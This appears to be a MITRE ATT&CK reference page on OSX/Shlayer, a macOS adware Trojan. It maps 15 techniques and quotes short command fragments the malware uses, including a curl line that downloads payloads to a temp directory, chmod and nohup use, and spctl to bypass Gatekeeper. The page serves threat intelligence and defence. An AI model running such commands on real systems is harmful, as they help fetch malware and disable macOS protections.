ATT&CKSoftwareOSX/Shlayer

OSX/Shlayer

S0402

Malware.View on attack.mitre.org

About this malware

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.

Techniques used15

Procedure examples15

TechniqueProcedure example
T1036.005
Match Legitimate Resource Name or Location

OSX/Shlayer can masquerade as a Flash Player update.

T1059.004
Unix Shell

OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.

T1082
System Information Discovery

OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command sw_vers -productVersion.

T1083
File and Directory Discovery

OSX/Shlayer has used the command appDir="$(dirname $(dirname "$currentDir"))" and $(dirname "$(pwd -P)") to construct installation paths.

T1105
Ingress Tool Transfer

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.

T1140
Deobfuscate/Decode Files or Information

OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.

T1176.001
Browser Extensions

OSX/Shlayer can install malicious Safari browser extensions to serve ads.

T1204.002
Malicious File

OSX/Shlayer has relied on users mounting and executing a malicious DMG file.

T1222.002
Linux and Mac Permissions

OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.

T1548.004
Elevated Execution with Prompt

OSX/Shlayer can escalate privileges to root by asking the user for credentials.

T1553.001
Gatekeeper Bypass

If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.

T1564
Hide Artifacts

OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)" or mktemp -t Installer.

T1564.001
Hidden Files and Directories

OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.

T1564.009
Resource Forking

OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.

T1564.011
Ignore Process Interrupts

OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.

Groups that use it0

None recorded.

Campaigns0

None recorded.

References2

  1. Carbon Black Shlayer Feb 2019 Open source
    Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
  2. Intego Shlayer Feb 2018 Open source
    Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.